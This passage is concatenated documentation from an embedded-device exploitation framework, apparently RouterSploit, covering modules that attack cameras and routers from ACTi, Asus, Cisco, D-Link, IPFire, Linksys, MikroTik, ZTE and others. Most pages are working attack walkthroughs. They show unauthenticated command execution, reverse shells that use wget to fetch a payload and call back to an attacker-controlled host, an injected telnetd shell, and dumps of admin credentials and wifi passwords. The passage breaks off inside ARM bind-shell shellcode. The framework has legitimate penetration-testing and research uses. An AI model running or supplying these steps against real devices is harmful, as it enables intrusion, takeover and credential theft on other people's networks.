`./rsf.py` 2. Do: `use encoders/python/hex` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/python/hex rsf (Python Hex Encoder) > show info Name: Python Hex Encoder Description: Module encodes Python payload to Hex format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/exploits/cameras/acti/acm_5611_rce.md ================================================ ## Description Module exploits ACTi ACM-5611 Video Camera Remote Command Execution Exploit. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/acti/acm_5611_rce 3. set target 192.168.1.1 4. run 5. If device is vulnerable user credentials are returned. ## Scenarios ``` rsf > use exploits/cameras/acti/acm_5611_rce rsf (JACTi ACM-5611 Video Camera RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JACTi ACM-5611 Video Camera RCE) > run [*] Running module... [+] Target seems to be vulnerable ================================================ FILE: docs/modules/exploits/cameras/geuterbruck/efd_2250.md ================================================ ## Description This module exploits a an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an anonymous user to execute arbitrary commands with root privileges. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/geuterbruck/efd_2250 3. set target 192.168.1.1 5. run 6. If device is vulnerable you will receive reverse shell. ## Scenarios ``` rsf > use exploits/cameras/geuterbruck/efd_2250 rsf (Geutebruck G-Cam/EFD-2250 RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Geutebruck G-Cam/EFD-2250 RCE) > run [*] Running module exploits/cameras/geuterbruck/efd_2250... [+] Target seams 192.168.1.1:80 is vulnerable ``` ================================================ FILE: docs/modules/exploits/cameras/jovision/jovision_credentials_disclosure.md ================================================ ## Description Module exploits a CGI script that doesn't validate whether the client is logged in on some jovision cameras to return credentials. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/jovision/jovision_credentials_disclosure 3. set target 192.168.1.1 4. run 5. If device is vulnerable user credentials are returned. ## Scenarios ``` rsf > use exploits/cameras/jovision/jovision_credentials_disclosure rsf (Jovision camera credential disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Jovision camera credential disclosure) > run [*] Running module... [+] Target seems to be vulnerable [+] Accounts found: Description Username Password Administrator ----------- -------- -------- ------------- Admin account admin ADMIN Yes Guest account guest 1234 No ``` ================================================ FILE: docs/modules/exploits/cameras/multi/cctv_dvr_rce.md ================================================ ## Description Remote Code Execution in CCTV-DVR affecting over 70 different vendors ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/multi/cctv_dvr_rce 3. set target 192.168.1.1 4. set connback 192.168.1.100:5555 5. run 6. If device is vulnerable you will receive reverse shell. ## Scenarios ``` rsf > use exploits/cameras/multi/cctv_dvr_rce rsf (Multiple CCTV-DVR Vendors) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Multiple CCTV-DVR Vendors) > set connback 192.168.1.100:5555 [+] connback => 192.168.1.100:5555 rsf (Multiple CCTV-DVR Vendors) > run [*] Running module... [+] Target is vulnerable [*] Exploit payload sent! [+] If nothing went wrong we should be getting a reversed remote shell at 192.168.1.100:5555 ``` ================================================ FILE: docs/modules/exploits/misc/watchguard/xcs_9_rce.md ================================================ ## Description This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other hand, a vulnerability in the web interface allows the attacker to inject operating system commands as the "nobody" user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/misc/watchguard/xcs_9_rce` 3. Do: `set target[TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/misc/watchguard/xcs_9_rce rsf (Watchguard XCS Remote Command Execution) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Watchguard XCS Remote Command Execution) > run [*] Running module exploits/misc/watchguard/xcs_9_rce... [*] Getting a valid session... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp x64 Bind TCP Creates interactive tcp bind shell for x64 architecture. reverse_tcp x64 Reverse TCP Creates interactive tcp reverse shell for x64 architecture. cmd > set payload reverse_tcp cmd (x64 Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd (x64 Reverse TCP) > set lhost 192.168.1.115 lhost => 192.168.1.115 cmd (x64 Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:56981 [+] Enjoy your shell ``` ================================================ FILE: docs/modules/exploits/routers/asus/asuswrt_lan_rce.md ================================================ ## Description Module exploits multiple vulnerabilities to achieve remote code execution in AsusWRT firmware. The HTTP server contains vulnerability that allows bypass authentication via POST requests. Combining this with another vulnerability in the VPN configuration upload functionality allows setting NVRAM configuration variables directly from the POST request. By setting nvram variable ateCommand_flag to 1 it is possible to enable special command mode which allows executing commands via infosvr server listening on port UDP 9999. Module was tested on Asus RT-AC68U 3.0.0.4.380_7378. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/asus/asuswrt_lan_rce` 3. Do: `set target[TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/asus/asuswrt_lan_rce rsf (AsusWRT Lan RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (AsusWRT Lan RCE) > run [*] Running module... [+] Successfuly set ateCommand_flag variable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture. reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture. cmd > set payload reverse_tcp cmd (ARMLE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd (ARMLE Reverse TCP) > set lhost 192.168.1.115 lhost => 192.168.1.115 cmd (ARMLE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:56981 [+] Enjoy your shell ls -la drwxr-xr-x 18 admin root 325 Mar 15 2017 . drwxr-xr-x 18 admin root 325 Mar 15 2017 .. drwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs drwxr-xr-x 2 admin root 706 Mar 15 2017 bin drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1 drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2 drwxr-xr-x 5 admin root 1540 Aug 1 2015 dev lrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc lrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home drwxr-xr-x 5 admin root 0 Sep 4 22:40 jffs drwxr-xr-x 3 admin root 402 Mar 15 2017 lib lrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media drwxr-xr-x 2 admin root 3 Mar 15 2017 mmc lrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt lrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt dr-xr-xr-x 106 admin root 0 Jan 1 1970 proc drwxr-xr-x 7 admin root 766 Mar 15 2017 rom lrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root drwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys drwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot drwxrwxrwx 13 admin root 860 Sep 4 22:50 tmp drwxr-xr-x 8 admin root 139 Mar 15 2017 usr lrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var drwxr-xr-x 14 admin root 6036 Mar 15 2017 www ``` ================================================ FILE: docs/modules/exploits/routers/asus/infosvr_backdoor_rce.md ================================================ ## Description Module exploits remote command execution in multiple ASUS devices. If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/asus/infosvr_backdoor_rce` 3. Do: `set target[TargetIP] 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/asus/infosvr_backdoor_rce rsf (Asus Infosvr Backdoor RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Infosvr Backdoor RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [*] Please note that only first 256 characters of the output will be displayed or use reverse_tcp [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture. reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture. cmd > set payload reverse_tcp cmd (ARMLE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd (ARMLE Reverse TCP) > set lhost 192.168.1.115 lhost => 192.168.1.115 cmd (ARMLE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:35220 [+] Enjoy your shell ls -la ls -la drwxr-xr-x 18 admin root 325 Mar 15 2017 . drwxr-xr-x 18 admin root 325 Mar 15 2017 .. drwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs drwxr-xr-x 2 admin root 706 Mar 15 2017 bin drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1 drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2 drwxr-xr-x 5 admin root 1540 Sep 4 23:04 dev lrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc lrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home drwxr-xr-x 5 admin root 0 Sep 4 23:25 jffs drwxr-xr-x 3 admin root 402 Mar 15 2017 lib lrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media drwxr-xr-x 2 admin root 3 Mar 15 2017 mmc lrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt lrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt dr-xr-xr-x 101 admin root 0 Jan 1 1970 proc drwxr-xr-x 7 admin root 766 Mar 15 2017 rom lrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root drwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys drwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot drwxrwxrwx 13 admin root 860 Sep 4 23:33 tmp drwxr-xr-x 8 admin root 139 Mar 15 2017 usr lrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var drwxr-xr-x 14 admin root 6036 Mar 15 2017 www ``` ================================================ FILE: docs/modules/exploits/routers/cisco/rv320_command_injection.md ================================================ ## Description Module exploits Cisco RV320 Remote Command Injection vulnerability in the web-based certificate generator feature. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/cisco/rv320_command_injection` 3. Do: `set target [TargetIP]` 4. Do: `set command [Remote Command]` 5. Do: `run` 6. If router is vulnerable, it should be possible to execute command on operating system level. ## Scenarios ``` rsf > use exploits/routers/cisco/rv320_command_injection rsf (Cisco RV320 Command Injection) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco RV320 Command Injection) > set command "telnetd -l /bin/sh -p 1337" [+] command => "telnetd -l /bin/sh -p 1337" rsf (Cisco RV320 Command Injection) > run [*] Running module exploits/routers/cisco/rv320_command_injection... [+] Target is vulnerable [*] Gonna go grab us a config file... [+] We seem to have found a valid config! [*] Extracting Creds... [+] Got user: cisco [+] Got password (hash): [redacted] [*] Sending request to extract auth key... [+] Got auth_key value: 1964300002 [+] Login Successful, we can proceed! [*] Ok, now to run your command: telnetd -l /bin/sh -p 1337 [*] We don't get output so... Yeah. Shits blind. ``` ================================================ FILE: docs/modules/exploits/routers/dlink/dir_655_866_652_rce.md ================================================ ## Description Module exploits unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/dlink/dir_655_866_652_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/dlink/dir_655_866_652_rce rsf (D-Link PingTest RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link PingTest RCE) > run [*] Running module exploits/routers/dlink/dir_655_866_652_rce... [+] Target is vulnerable [*] Invoking command loop... [*] It is blind command injection, response is not available [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture. reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture. cmd > set payload reverse_tcp cmd (MIPSLE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSLE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSLE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ls -la drwxrwxrwx 15 admin root 224 Mar 11 2013 . drwxrwxrwx 15 admin root 224 Mar 11 2013 .. drwxr-xr-x 2 admin root 2554 Mar 11 2013 bin drwxr-xr-x 2 admin root 3 Mar 11 2013 data drwxr-xr-x 4 admin root 2482 Mar 11 2013 dev drwxr-xr-x 12 admin root 779 Mar 11 2013 etc drwxr-xr-x 6 admin root 690 Mar 11 2013 lib lrwxrwxrwx 1 admin root 11 Mar 11 2013 linuxrc -> bin/busybox drwxr-xr-x 2 admin root 0 Jan 1 1970 mnt drwxr-xr-x 5 admin root 56 Mar 11 2013 opt dr-xr-xr-x 69 admin root 0 Jan 1 1970 proc drwxr-xr-x 2 admin root 270 Mar 11 2013 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys lrwxrwxrwx 1 admin root 8 Mar 11 2013 tmp -> /var/tmp drwxr-xr-x 4 admin root 38 Mar 11 2013 usr drwxr-xr-x 16 admin root 0 Oct 19 20:36 var drwxr-xr-x 5 admin root 2801 Mar 11 2013 webs ``` ================================================ FILE: docs/modules/exploits/routers/dlink/dsl_2750b_rce.md ================================================ ## Description This module exploits remote code execution vulnerability in D-Link DSL-2750B devices through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/dlink/dsl_2750b_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/dlink/dsl_2750b_rce rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link DSL-2750B RCE) > run [*] Running module... [+] Target appears to be vulnerable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture. reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture. cmd > set payload reverse_tcp cmd (MIPSBE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSBE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ls -la drwxrwxrwx 15 admin root 224 Mar 11 2013 . drwxrwxrwx 15 admin root 224 Mar 11 2013 .. drwxr-xr-x 2 admin root 2554 Mar 11 2013 bin drwxr-xr-x 2 admin root 3 Mar 11 2013 data drwxr-xr-x 4 admin root 2482 Mar 11 2013 dev drwxr-xr-x 12 admin root 779 Mar 11 2013 etc drwxr-xr-x 6 admin root 690 Mar 11 2013 lib lrwxrwxrwx 1 admin root 11 Mar 11 2013 linuxrc -> bin/busybox drwxr-xr-x 2 admin root 0 Jan 1 1970 mnt drwxr-xr-x 5 admin root 56 Mar 11 2013 opt dr-xr-xr-x 69 admin root 0 Jan 1 1970 proc drwxr-xr-x 2 admin root 270 Mar 11 2013 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys lrwxrwxrwx 1 admin root 8 Mar 11 2013 tmp -> /var/tmp drwxr-xr-x 4 admin root 38 Mar 11 2013 usr drwxr-xr-x 16 admin root 0 Oct 19 20:36 var drwxr-xr-x 5 admin root 2801 Mar 11 2013 webs ``` ================================================ FILE: docs/modules/exploits/routers/ipfire/ipfire_proxy_rce.md ================================================ ## Description This module exploits IPFire < 2.19 Core Update 101 Remote Code Execution vulnerability which allows executing commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/ipfire/ipfire_proxy_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload awk_reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/ipfire/ipfire_proxy_rce rsf (IPFire Proxy RCE) > set target 192.168.2.88 [+] target => 192.168.2.88 rsf (IPFire Proxy RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > uname -a [*] Executing 'uname -a' on the device... Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk. awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk. awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk. cmd > set payload awk_reverse_tcp cmd (Awk Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd awk Awk binary cmd (Awk Reverse TCP) > set lhost 192.168.2.100 lhost => 192.168.2.100 cmd (Awk Reverse TCP) > run [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.2.88:44168 [+] Enjoy your shell uname -a Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux whoami nobody id uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody) ``` ================================================ FILE: docs/modules/exploits/routers/ipfire/ipfire_shellshock.md ================================================ ## Description Exploits shellshock vulnerability in IPFire <= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/ipfire/ipfire_shellshock` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload awk_reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/ipfire/ipfire_proxy_rce rsf (IPFire Proxy RCE) > set target 192.168.2.88 [+] target => 192.168.2.88 rsf (IPFire Proxy RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- ssl true SSL enabled: true/false target 192.168.2.88 Target IPv4 or IPv6 address port 444 Target HTTP port Module options: Name Current settings Description ---- ---------------- ----------- verbosity true Verbosity enabled: true/false username admin Username to log in with password admin Password to log in with rsf (IPFire Proxy RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > uname -a [*] Executing 'uname -a' on the device... Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk. awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk. awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk. cmd > set payload awk_reverse_tcp cmd (Awk Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd awk Awk binary cmd (Awk Reverse TCP) > set lhost 192.168.2.100 lhost => 192.168.2.100 cmd (Awk Reverse TCP) > run [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.2.88:48775 [+] Enjoy your shell id uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody) ``` ================================================ FILE: docs/modules/exploits/routers/linksys/eseries_themoon_rce.md ================================================ ## Description This module exploits remote code execution vulnerability in multiple Linksys E-Series devices. Vulnerability was actively used by TheMoon worm. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/linksys/eseries_themoon_rce` 3. Do `uset target [TargetIP]` 4. Do `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do `set payload reverse_tcp` 7. Do `set lhost [AttackerIP]` 8. Do `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/linksys/eseries_themoon_rce rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys E-Series TheMoon RCE) > run [*] Running module... [+] Target appears to be vulnerable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture. reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture. cmd > set payload reverse_tcp cmd (MIPSBE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSBE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ``` ================================================ FILE: docs/modules/exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure.md ================================================ ## Description Module bypass authentication through WinBox service in Mikrotik devices version from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) and retrieves administrative credentials. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If device is vulnerable administrative credentials are returned. ## Scenarios ``` rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run [*] Running module... [*] Connection established [+] Target seems to be vulnerable [*] Dumping credentials Username Password -------- -------- user1 test admin admin admin admin ``` ================================================ FILE: docs/modules/exploits/routers/multi/tcp_32764_info_disclosure.md ================================================ ## Description Module exploits backdoor functionality that allows fetching credentials for administrator user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/multi/tcp_32764_info_disclosure` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If device is vulnerable administrative credentials are returned. ## Scenarios ``` rsf > use exploits/routers/multi/tcp_32764_info_disclosure rsf (TCP-32764 Info Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TCP-32764 Info Disclosure) > run [*] Running module... [+] Target is vulnerable [*] Connection established Parameter Value --------- ----- http_username admin http_password admin pppoe_username username pppoe_password 1234567890 pppoa_username Guest log_login 0 ``` ================================================ FILE: docs/modules/exploits/routers/multi/tcp_32764_rce.md ================================================ ## Description Module exploits backdoor functionality that allows executing commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/multi/tcp_32764_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If device is vulnerable it is possible to execute commands on operating system level. ## Scenarios ``` rsf > use exploits/routers/multi/tcp_32764_rce rsf (TCP-32764 RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TCP-32764 RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > echo test [*] Executing 'echo test' on the device... [*] Connection established test cmd > ``` ================================================ FILE: docs/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.md ================================================ ## Description Module exploits wifi password disclosure vulnerability that allows to retrieve password for wifi connection. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If device is vulnerable ssid and wifi password is retrieved. ## Scenarios ``` rsf > use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure rsf (ZTE ZXHN H108N Wifi Password Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE ZXHN H108N Wifi Password Disclosure) > run [*] Running module exploits/routers/zte/zxhn_h108n_wifi_password_disclosure... [+] Target is vulnerable [*] Discovered information: Parameter Value --------- ----- SSID Name SSID Name Password Password ``` ================================================ FILE: docs/modules/generic/upnp/ssdp_msearch.md ================================================ ## Description Module sends M-SEARCH request to target and retrieve information from UPnP enabled systems. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use generic/upnp/ssdp_msearch` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If target supports UPnP information are retrieved. ## Scenarios ``` rsf > use generic/upnp/ssdp_msearch rsf (SSDP M-SEARCH Info Discovery) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (SSDP M-SEARCH Info Discovery) > run [*] Running module... [*] 192.168.1.1:1900 | Custom/1.0 UPnP/1.0 Proc/Ver | http://192.168.1.1:5431/dyndev/uuid:ec2280e5-e804-04e8-e580-22ec22e50400 | uuid:ec2280e5-e804-04e8-e580-22ec22e50400::upnp:rootdevice ``` ================================================ FILE: docs/modules/payloads/armle/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for ARMLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/armle/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates armle bind shell tcp payload ## Scenarios ``` rsf > use payloads/armle/bind_tcp rsf (ARMLE Bind TCP) > set rport 4321 [+] rport => 4321 rsf (ARMLE Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d" "\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0" "\x8d\xe2\x00\x60\xa0\xe1\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01" "\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0" "\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d" "\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0" "\x8d\xe2\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d" "\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1" "\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0" "\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60" "\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01" "\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0" 